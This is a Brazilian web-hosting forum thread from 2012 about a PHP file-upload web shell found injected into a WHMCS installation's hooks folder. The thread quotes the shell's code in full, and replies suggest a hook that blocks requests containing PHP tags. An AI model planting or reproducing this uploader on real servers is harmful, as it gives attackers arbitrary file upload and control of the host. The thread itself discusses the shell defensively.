lucasippon Postado Fevereiro 1, 2012 Compartilhar Postado Fevereiro 1, 2012 Recebi um codigo diferente hoje, e passou batido pelo arquivo criado no includes/hooks/ <?php echo '<form action=" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } else { echo '<b>Upload GAGAL !!!</b><br><br>'; } } ?> ) Será que corro algum risco? Estou usando a versão 5.03 do WHMCS Valeu! Não sei se a versão 5 ja vem com o patch de segurança instalado, porém se você ja instalou o patch de segurança anteriormente não corre nenhum risco, pelo menos são que eles alegam. Link para o comentário Compartilhar em outros sites More sharing options...
edvan Postado Fevereiro 3, 2012 Compartilhar Postado Fevereiro 3, 2012 Re Recebi um codigo diferente hoje, e passou batido pelo arquivo criado no includes/hooks/ '; echo ' '; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!! '; } else { echo 'Upload GAGAL !!! '; } } ?> ) Será que corro algum risco? Estou usando a versão 5.03 do WHMCS Valeu! Realmente não tem problema conforme o @lucasippon informou! Se quiser bloquear essas tentativas duplique o hooks e na linha 4 altere para if (strpos($_REQUEST[$checkvar],'<?php')!==false) { Link para o comentário Compartilhar em outros sites More sharing options...
GrandeHost Postado Fevereiro 3, 2012 Compartilhar Postado Fevereiro 3, 2012 Ja aconteceu comigo isso em janeiro agora tb. Link para o comentário Compartilhar em outros sites More sharing options...
Helcio Postado Fevereiro 3, 2012 Compartilhar Postado Fevereiro 3, 2012 Esse script do TIU Edvan é porreta mesmo! Depois de colocar ele na pasta não tive mais problemas. E agora vive aparecendo uns ip's banidos na lista, tem até comédinha BR no meio!!!!!! Valeu Edvan. Link para o comentário Compartilhar em outros sites More sharing options...
Lperez Postado Fevereiro 3, 2012 Compartilhar Postado Fevereiro 3, 2012 Re Realmente não tem problema conforme o @lucasippon informou! Se quiser bloquear essas tentativas duplique o hooks e na linha 4 altere para if (strpos($_REQUEST[$checkvar],' Obrigado Edvan! Link para o comentário Compartilhar em outros sites More sharing options...
edvan Postado Fevereiro 3, 2012 Compartilhar Postado Fevereiro 3, 2012 Esse script do TIU Edvan é porreta mesmo! Depois de colocar ele na pasta não tive mais problemas. E agora vive aparecendo uns ip's banidos na lista, tem até comédinha BR no meio!!!!!! Valeu Edvan. Obrigado Edvan! Na verdade o script não é meu... Foi publicado em http://www.portaldohost.com.br/whmcs/onda-de-ataques-ao-whmcs-o-que-fazer sendo que o original é do http://www.webhostingtalk.com/showpost.php?p=7856656&postcount=68 Eu apenas dei uma incrementada ( bloqueio de IP + notificação/registro ). Link para o comentário Compartilhar em outros sites More sharing options...
garuva Postado Fevereiro 9, 2012 Compartilhar Postado Fevereiro 9, 2012 Estou pensando seriamente em abandonar o WHMCS, embora sei que este esta entre os melhores senão o melhor gerenciador de host, mas infelizmente sua segurança é pífia. Notório que a empresa do WHMCS esta deixando a desejar, pois é inadmissível esta quantidade de problemas que esta ocorrendo em um produto que pagamos para funcionar corretamente. Espero que não me levem a mal, pois como disse o WHMCS é excelente no quesito funcionalidade entretanto a partir do momento que temos que mudar pastas, mexer em códigos contratar módulos de segurança separados me parece descaso os usuários já que se isso resolve o problema, porque não tem uma versão com estas soluções. Link para o comentário Compartilhar em outros sites More sharing options...
Posts Recomendados